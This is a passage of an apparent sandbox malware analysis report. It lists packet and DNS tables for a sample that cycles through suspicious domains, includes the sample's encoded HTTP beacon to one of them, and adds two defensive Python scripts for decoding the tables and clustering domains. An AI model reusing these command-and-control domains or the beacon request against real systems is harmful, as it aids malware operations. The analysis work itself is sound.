Oct 8, 2024 15:37:01.359060049 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:01.359075069 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:01.359095097 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:02.187890053 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:03.206935883 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:03.212194920 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.212335110 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:03.223001003 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:03.227977991 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.228914976 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.925353050 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.925373077 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.925398111 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.925409079 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.925498009 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:03.925537109 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:03.925544977 CEST | 80 | 60862 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:03.927361012 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:04.757700920 CEST | 60862 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:05.769387007 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:05.774384975 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:05.774467945 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:05.782306910 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:05.787086964 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472611904 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472735882 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472752094 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472765923 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472784042 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472804070 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472816944 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.472836018 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.473050117 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:06.473050117 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:06.473220110 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.473464012 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.473776102 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:06.473912001 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:06.479140043 CEST | 60863 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:06.484092951 CEST | 80 | 60863 | 194.58.112.174 | 192.168.2.9
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Oct 8, 2024 15:33:31.960488081 CEST | 53 | 50796 | 162.159.36.2 | 192.168.2.9
Oct 8, 2024 15:33:32.431962013 CEST | 51043 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:33:32.439408064 CEST | 53 | 51043 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:33:36.184190035 CEST | 59926 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:33:36.209781885 CEST | 53 | 59926 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:33:52.864052057 CEST | 58461 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:33:52.895015001 CEST | 53 | 58461 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:34:06.441562891 CEST | 57826 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:34:06.455951929 CEST | 53 | 57826 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:34:19.582298040 CEST | 49386 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:34:19.601962090 CEST | 53 | 49386 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:34:33.659929991 CEST | 58605 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:34:34.470103979 CEST | 53 | 58605 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:34:48.520024061 CEST | 52788 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:34:48.533149004 CEST | 53 | 52788 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:35:06.707832098 CEST | 55852 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:35:06.743119955 CEST | 53 | 55852 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:35:20.395275116 CEST | 58888 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:35:20.736262083 CEST | 53 | 58888 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:35:34.817804098 CEST | 52242 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:35:35.358998060 CEST | 53 | 52242 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:36:09.411092043 CEST | 61251 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:36:09.426366091 CEST | 53 | 61251 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:36:17.677227974 CEST | 60556 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:36:17.723215103 CEST | 53 | 60556 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:36:30.883127928 CEST | 63443 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:36:31.345695972 CEST | 53 | 63443 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:36:44.457973957 CEST | 50073 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:36:44.576714993 CEST | 53 | 50073 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:36:58.020536900 CEST | 65463 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:36:58.107594967 CEST | 53 | 65463 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:37:12.488759995 CEST | 56129 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:37:12.500932932 CEST | 53 | 56129 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 15:37:26.007184029 CEST | 58784 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 15:37:26.603116035 CEST | 53 | 58784 | 1.1.1.1 | 192.168.2.9
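The packet and DNS tables in this report are exported with their column separators lost, so ports and addresses run together, and the signal that matters (the sample resolving one low-reputation domain after another, then opening port-80 connections to whichever address answered, a couple of seconds apart) is hard to read off by eye. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it decodes the fused rows by enumerating every possible split and keeping only the reading that is consistent, then summarises the connection cadence per remote host and the set of names queried. It assumes the analysis VM is 192.168.2.9 (the address shown in the tables) and that the VM's side of every connection uses a port from the Windows default dynamic range (49152 and up); the sample rows are copied from the tables above and embedded inline.

```python
import re
from collections import Counter
from datetime import datetime
from statistics import median

# Assumptions for this added example (not stated by the report itself):
SANDBOX_HOST = "192.168.2.9"   # analysis VM address as it appears in the report's tables
EPHEMERAL_MIN = 49152          # start of the Windows default dynamic (client) port range

# Constructed sample input: rows copied from the report's flattened TCP and DNS tables.
# A packet row is "<timestamp> CEST<src port><dst port><src ip><dst ip>" with no separators.
TCP_ROWS = [
    "Oct 8, 2024 15:36:49.717428923 CEST8060858195.161.68.8192.168.2.9",
    "Oct 8, 2024 15:36:50.434708118 CEST6085880192.168.2.9195.161.68.8",
    "Oct 8, 2024 15:36:52.240621090 CEST6085980192.168.2.9195.161.68.8",
    "Oct 8, 2024 15:36:52.246011972 CEST8060859195.161.68.8192.168.2.9",
    "Oct 8, 2024 15:36:58.110794067 CEST6086080192.168.2.9194.58.112.174",
    "Oct 8, 2024 15:37:00.659971952 CEST6086180192.168.2.9194.58.112.174",
    "Oct 8, 2024 15:37:03.206935883 CEST6086280192.168.2.9194.58.112.174",
    "Oct 8, 2024 15:37:05.769387007 CEST6086380192.168.2.9194.58.112.174",
]
DNS_ROWS = [
    "Oct 8, 2024 15:33:32.431962013 CEST192.168.2.91.1.1.10xa920Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false",
    "Oct 8, 2024 15:33:36.184190035 CEST192.168.2.91.1.1.10xb2e9Standard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false",
    "Oct 8, 2024 15:33:52.864052057 CEST192.168.2.91.1.1.10x22bcStandard query (0)www.falconclub.onlineA (IP address)IN (0x0001)false",
    "Oct 8, 2024 15:34:33.659929991 CEST192.168.2.91.1.1.10x99e7Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false",
    "Oct 8, 2024 15:35:06.707832098 CEST192.168.2.91.1.1.10x90daStandard query (0)www.demovix.xyzA (IP address)IN (0x0001)false",
]

PACKET_RE = re.compile(r"^(?P<ts>.+?) CEST(?P<rest>[\d.]+)$")
DNS_RE = re.compile(
    r"^(?P<ts>.+?) CEST(?P<ips>[\d.]+?)0x(?P<tid>[0-9a-f]{4})(?P<op>.+?\(\d+\))"
    r"(?P<name>\S+?)(?P<rtype>A|AAAA|PTR|CNAME|MX|TXT|NS) \([^)]*\)IN \(0x0001\)(?P<doh>true|false)$"
)


def _parse_ts(text):
    # the report carries nanoseconds; datetime takes microseconds, so truncate the fraction
    main, frac = text.rsplit(".", 1)
    return datetime.strptime(f"{main}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def _valid_port(s):
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and 1 <= int(s) <= 65535


def _valid_ip(s):
    octets = s.split(".")
    return len(octets) == 4 and all(
        o.isdigit() and (len(o) == 1 or o[0] != "0") and int(o) <= 255 for o in octets)


def _ip_splits(fused):
    """All cuts of '<ip><ip>' where both halves are valid and exactly one is the sandbox host."""
    return [(fused[:k], fused[k:]) for k in range(7, len(fused) - 6)
            if _valid_ip(fused[:k]) and _valid_ip(fused[k:])
            and (fused[:k] == SANDBOX_HOST) != (fused[k:] == SANDBOX_HOST)]


def split_packet_row(row):
    """Decode one fused packet row into (timestamp, src_port, dst_port, src_ip, dst_ip).

    The leading digit run holds <src port><dst port><first octet ...>, so every port-length
    pair is tried; a reading survives only if both ports and both addresses are in range,
    one endpoint is the sandbox host and that host's port is ephemeral. Exactly one reading
    must survive: an ambiguous row is reported, never guessed.
    """
    m = PACKET_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised packet row: {row!r}")
    rest, readings = m.group("rest"), []
    for i in range(1, 6):
        for j in range(i + 1, i + 6):
            sp, dp = rest[:i], rest[i:j]
            if not (_valid_port(sp) and _valid_port(dp)):
                continue
            for sip, dip in _ip_splits(rest[j:]):
                local_port = int(sp) if sip == SANDBOX_HOST else int(dp)
                if local_port >= EPHEMERAL_MIN:
                    readings.append((int(sp), int(dp), sip, dip))
    if len(readings) != 1:
        raise ValueError(f"ambiguous packet row ({len(readings)} readings): {row!r}")
    return (_parse_ts(m.group("ts")),) + readings[0]


def parse_dns_row(row):
    """Decode one fused DNS-query row into a dict (name, record type, transaction id, ...)."""
    m = DNS_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised DNS row: {row!r}")
    splits = _ip_splits(m.group("ips"))
    if len(splits) != 1:
        raise ValueError(f"ambiguous address pair in DNS row: {row!r}")
    src, dst = splits[0]
    return {"ts": _parse_ts(m.group("ts")), "src": src, "dst": dst, "tid": int(m.group("tid"), 16),
            "name": m.group("name"), "rtype": m.group("rtype"), "doh": m.group("doh") == "true"}


def queried_domains(rows):
    """Ordered unique names requested as A records, plus a count per top-level domain."""
    names = []
    for q in map(parse_dns_row, rows):
        if q["rtype"] == "A" and q["name"] not in names:
            names.append(q["name"])
    return names, Counter(n.rsplit(".", 1)[-1] for n in names)


def beacon_summary(rows):
    """Per remote ip:port, the number of outbound connections and the median gap in seconds
    between consecutive ones; a connection is the first sandbox-side packet on a local port."""
    starts = {}
    for ts, sp, dp, sip, dip in map(split_packet_row, rows):
        if sip == SANDBOX_HOST:
            key = (dip, dp, sp)
            starts[key] = min(starts.get(key, ts), ts)
    per_host = {}
    for (dip, dp, _sp), ts in sorted(starts.items(), key=lambda kv: kv[1]):
        per_host.setdefault(f"{dip}:{dp}", []).append(ts)
    out = {}
    for host, times in per_host.items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        out[host] = {"connections": len(times), "median_gap_s": round(median(gaps), 1) if gaps else None}
    return out


if __name__ == "__main__":
    for host, stats in beacon_summary(TCP_ROWS).items():
        print(host, stats)
    names, tlds = queried_domains(DNS_ROWS)
    print(len(names), "names queried for A records; TLDs:", dict(tlds))
```

Rejecting rows with more than one consistent reading is deliberate: "8060858" can be read as 80/60858 or 8060/858, and only the ephemeral-port rule settles it, so any row where that rule does not single out one reading should be looked at by hand rather than silently picked. On the sample rows the script reports two connections to 195.161.68.8:80 about 1.8 s apart and four to 194.58.112.174:80 about 2.5 s apart, which is the cadence a detection rule on proxy or NetFlow data would key on.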
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Oct 8, 2024 15:33:32.431962013 CEST | 192.168.2.9 | 1.1.1.1 | 0xa920 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 8, 2024 15:33:36.184190035 CEST | 192.168.2.9 | 1.1.1.1 | 0xb2e9 | Standard query (0) | www.multileveltravel.world | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:33:52.864052057 CEST | 192.168.2.9 | 1.1.1.1 | 0x22bc | Standard query (0) | www.falconclub.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:06.441562891 CEST | 192.168.2.9 | 1.1.1.1 | 0x22f8 | Standard query (0) | www.promasterev.shop | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:19.582298040 CEST | 192.168.2.9 | 1.1.1.1 | 0xc611 | Standard query (0) | www.childlesscatlady.today | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:33.659929991 CEST | 192.168.2.9 | 1.1.1.1 | 0x99e7 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:48.520024061 CEST | 192.168.2.9 | 1.1.1.1 | 0x46b8 | Standard query (0) | www.doggieradio.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:35:06.707832098 CEST | 192.168.2.9 | 1.1.1.1 | 0x90da | Standard query (0) | www.demovix.xyz | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:35:20.395275116 CEST | 192.168.2.9 | 1.1.1.1 | 0xaf9a | Standard query (0) | www.palcoconnector.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:35:34.817804098 CEST | 192.168.2.9 | 1.1.1.1 | 0x6d0e | Standard query (0) | www.shanhaiguan.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:09.411092043 CEST | 192.168.2.9 | 1.1.1.1 | 0xe8fa | Standard query (0) | www.mtcep.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:17.677227974 CEST | 192.168.2.9 | 1.1.1.1 | 0x6517 | Standard query (0) | www.es-lidl.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:30.883127928 CEST | 192.168.2.9 | 1.1.1.1 | 0xf9dc | Standard query (0) | www.wajf.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:44.457973957 CEST | 192.168.2.9 | 1.1.1.1 | 0x7fed | Standard query (0) | www.drivedoge.website | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:58.020536900 CEST | 192.168.2.9 | 1.1.1.1 | 0x84d4 | Standard query (0) | www.torex33.online | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                              Oct 8, 2024 15:37:12.488759995 CEST192.168.2.91.1.1.10xc729Standard query (0)www.broomeorchard.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:26.007184029 CEST192.168.2.91.1.1.10x47aeStandard query (0)www.wcq24.topA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 15:33:32.439408064 CEST | 1.1.1.1 | 192.168.2.9 | 0xa920 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 8, 2024 15:33:36.209781885 CEST | 1.1.1.1 | 192.168.2.9 | 0xb2e9 | No error (0) | www.multileveltravel.world | multileveltravel.world | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:33:36.209781885 CEST | 1.1.1.1 | 192.168.2.9 | 0xb2e9 | No error (0) | multileveltravel.world | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:33:36.209781885 CEST | 1.1.1.1 | 192.168.2.9 | 0xb2e9 | No error (0) | multileveltravel.world | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:33:52.895015001 CEST | 1.1.1.1 | 192.168.2.9 | 0x22bc | No error (0) | www.falconclub.online | | 74.208.236.25 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:06.455951929 CEST | 1.1.1.1 | 192.168.2.9 | 0x22f8 | No error (0) | www.promasterev.shop | promasterev.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:34:06.455951929 CEST | 1.1.1.1 | 192.168.2.9 | 0x22f8 | No error (0) | promasterev.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:06.455951929 CEST | 1.1.1.1 | 192.168.2.9 | 0x22f8 | No error (0) | promasterev.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:19.601962090 CEST | 1.1.1.1 | 192.168.2.9 | 0xc611 | No error (0) | www.childlesscatlady.today | childlesscatlady.today | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:34:19.601962090 CEST | 1.1.1.1 | 192.168.2.9 | 0xc611 | No error (0) | childlesscatlady.today | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:19.601962090 CEST | 1.1.1.1 | 192.168.2.9 | 0xc611 | No error (0) | childlesscatlady.today | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:34.470103979 CEST | 1.1.1.1 | 192.168.2.9 | 0x99e7 | No error (0) | www.animekuid.xyz | animekuid.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:34:34.470103979 CEST | 1.1.1.1 | 192.168.2.9 | 0x99e7 | No error (0) | animekuid.xyz | | 203.175.9.128 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:48.533149004 CEST | 1.1.1.1 | 192.168.2.9 | 0x46b8 | No error (0) | www.doggieradio.net | doggieradio.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:34:48.533149004 CEST | 1.1.1.1 | 192.168.2.9 | 0x46b8 | No error (0) | doggieradio.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:34:48.533149004 CEST | 1.1.1.1 | 192.168.2.9 | 0x46b8 | No error (0) | doggieradio.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:35:06.743119955 CEST | 1.1.1.1 | 192.168.2.9 | 0x90da | No error (0) | www.demovix.xyz | | 199.192.19.19 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:35:20.736262083 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf9a | No error (0) | www.palcoconnector.net | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:35:35.358998060 CEST | 1.1.1.1 | 192.168.2.9 | 0x6d0e | No error (0) | www.shanhaiguan.net | | 156.242.132.82 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:09.426366091 CEST | 1.1.1.1 | 192.168.2.9 | 0xe8fa | Name error (3) | www.mtcep.org | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:17.723215103 CEST | 1.1.1.1 | 192.168.2.9 | 0x6517 | No error (0) | www.es-lidl.online | es-lidl.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:36:17.723215103 CEST | 1.1.1.1 | 192.168.2.9 | 0x6517 | No error (0) | es-lidl.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:31.345695972 CEST | 1.1.1.1 | 192.168.2.9 | 0xf9dc | No error (0) | www.wajf.net | comingsoon.namebright.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:36:31.345695972 CEST | 1.1.1.1 | 192.168.2.9 | 0xf9dc | No error (0) | comingsoon.namebright.com | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:36:31.345695972 CEST | 1.1.1.1 | 192.168.2.9 | 0xf9dc | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | | 3.91.127.116 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:31.345695972 CEST | 1.1.1.1 | 192.168.2.9 | 0xf9dc | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | | 34.194.102.142 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:44.576714993 CEST | 1.1.1.1 | 192.168.2.9 | 0x7fed | No error (0) | www.drivedoge.website | | 195.161.68.8 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:36:58.107594967 CEST | 1.1.1.1 | 192.168.2.9 | 0x84d4 | No error (0) | www.torex33.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:37:12.500932932 CEST | 1.1.1.1 | 192.168.2.9 | 0xc729 | No error (0) | www.broomeorchard.xyz | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:37:12.500932932 CEST | 1.1.1.1 | 192.168.2.9 | 0xc729 | No error (0) | www.broomeorchard.xyz | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:37:26.603116035 CEST | 1.1.1.1 | 192.168.2.9 | 0x47ae | No error (0) | www.wcq24.top | wcq24.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:37:26.603116035 CEST | 1.1.1.1 | 192.168.2.9 | 0x47ae | No error (0) | wcq24.top | | 154.23.184.240 | A (IP address) | IN (0x0001) | false
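The query and reply tables above show the sample asking for a new domain roughly every 14 seconds, one name (www.mtcep.org) coming back NXDOMAIN, and four of the names (www.multileveltravel.world, www.promasterev.shop, www.childlesscatlady.today, www.doggieradio.net) ending at the same pair of addresses, 3.33.130.190 and 15.197.148.33. Before treating every domain in such a list as live C2, an analyst normally follows the CNAME chains and groups the queried names by the address they end at, since a cluster on one address usually points at shared hosting or registrar parking rather than separate infrastructure. The script below is an added example, not part of the Joe Sandbox report: the rows are a constructed subset copied from the reply table (seven of the queried domains plus the PTR lookup), the queried-name list comes from the query table, and the minimum of two names for an address to count as "shared" is an assumption.

```python
from collections import defaultdict

# Constructed subset of the DNS reply rows in the report:
# (reply_code, name, cname, address, record_type); "" is an empty cell.
DNS_REPLIES = [
    ("Name error (3)", "206.23.85.13.in-addr.arpa", "none", "none", "PTR"),
    ("No error (0)", "www.multileveltravel.world", "multileveltravel.world", "", "CNAME"),
    ("No error (0)", "multileveltravel.world", "", "3.33.130.190", "A"),
    ("No error (0)", "multileveltravel.world", "", "15.197.148.33", "A"),
    ("No error (0)", "www.falconclub.online", "", "74.208.236.25", "A"),
    ("No error (0)", "www.promasterev.shop", "promasterev.shop", "", "CNAME"),
    ("No error (0)", "promasterev.shop", "", "3.33.130.190", "A"),
    ("No error (0)", "promasterev.shop", "", "15.197.148.33", "A"),
    ("No error (0)", "www.childlesscatlady.today", "childlesscatlady.today", "", "CNAME"),
    ("No error (0)", "childlesscatlady.today", "", "3.33.130.190", "A"),
    ("No error (0)", "childlesscatlady.today", "", "15.197.148.33", "A"),
    ("No error (0)", "www.animekuid.xyz", "animekuid.xyz", "", "CNAME"),
    ("No error (0)", "animekuid.xyz", "", "203.175.9.128", "A"),
    ("No error (0)", "www.doggieradio.net", "doggieradio.net", "", "CNAME"),
    ("No error (0)", "doggieradio.net", "", "3.33.130.190", "A"),
    ("No error (0)", "doggieradio.net", "", "15.197.148.33", "A"),
    ("No error (0)", "www.demovix.xyz", "", "199.192.19.19", "A"),
    ("Name error (3)", "www.mtcep.org", "none", "none", "A"),
    ("No error (0)", "www.wajf.net", "comingsoon.namebright.com", "", "CNAME"),
    ("No error (0)", "comingsoon.namebright.com",
     "cdl-lb-1356093980.us-east-1.elb.amazonaws.com", "", "CNAME"),
    ("No error (0)", "cdl-lb-1356093980.us-east-1.elb.amazonaws.com", "", "3.91.127.116", "A"),
    ("No error (0)", "cdl-lb-1356093980.us-east-1.elb.amazonaws.com", "", "34.194.102.142", "A"),
]

# Names the sample itself asked for (from the query table). CNAME targets such as
# comingsoon.namebright.com are resolver hops, not queries, and must not be counted.
QUERIED = [
    "www.multileveltravel.world", "www.falconclub.online", "www.promasterev.shop",
    "www.childlesscatlady.today", "www.animekuid.xyz", "www.doggieradio.net",
    "www.demovix.xyz", "www.mtcep.org", "www.wajf.net",
]


def build_graph(rows):
    """Split reply rows into a CNAME map, an A-record map and the NXDOMAIN set."""
    cname, a_recs, nxdomain = {}, defaultdict(set), set()
    for code, name, target, addr, rtype in rows:
        if code.startswith("Name error"):
            nxdomain.add(name)
        elif rtype == "CNAME":
            cname[name] = target
        elif rtype == "A":
            a_recs[name].add(addr)
    return cname, a_recs, nxdomain


def resolve(name, cname, a_recs, max_hops=8):
    """Follow the CNAME chain (loop-safe, bounded) and return the final A addresses."""
    seen = set()
    while name in cname and name not in seen and len(seen) < max_hops:
        seen.add(name)
        name = cname[name]
    return set(a_recs.get(name, ()))


def cluster_by_address(queried, rows):
    """Map each final address to the sorted list of queried names that reach it."""
    cname, a_recs, _ = build_graph(rows)
    clusters = defaultdict(set)
    for q in queried:
        for ip in resolve(q, cname, a_recs):
            clusters[ip].add(q)
    return {ip: sorted(names) for ip, names in clusters.items()}


def shared_addresses(queried, rows, min_names=2):
    """Addresses reached by at least min_names queried domains (threshold is an assumption)."""
    return {ip: names for ip, names in cluster_by_address(queried, rows).items()
            if len(names) >= min_names}


def unresolved(queried, rows):
    """Queried names the resolver answered with NXDOMAIN."""
    _, _, nxdomain = build_graph(rows)
    return sorted(q for q in queried if q in nxdomain)


if __name__ == "__main__":
    for ip, names in sorted(shared_addresses(QUERIED, DNS_REPLIES).items()):
        print(ip, "<-", ", ".join(names))
    print("NXDOMAIN:", unresolved(QUERIED, DNS_REPLIES))
```

Run against the rows above, the two addresses 3.33.130.190 and 15.197.148.33 each collect the same four queried names, www.wajf.net ends at two ELB addresses only after two CNAME hops, and www.mtcep.org is the one NXDOMAIN; the single-address names (www.falconclub.online, www.animekuid.xyz, www.demovix.xyz) are the ones worth looking at individually, and session 1 below does in fact go to www.falconclub.online.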
• www.multileveltravel.world
• www.falconclub.online
• www.promasterev.shop
• www.childlesscatlady.today
• www.animekuid.xyz
• www.doggieradio.net
• www.demovix.xyz
• www.palcoconnector.net
• www.shanhaiguan.net
• www.es-lidl.online
• www.wajf.net
• www.drivedoge.website
• www.torex33.online
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 60549 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:33:36.230236053 CEST | 483 | OUT | GET /hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.multileveltravel.world
Connection: close
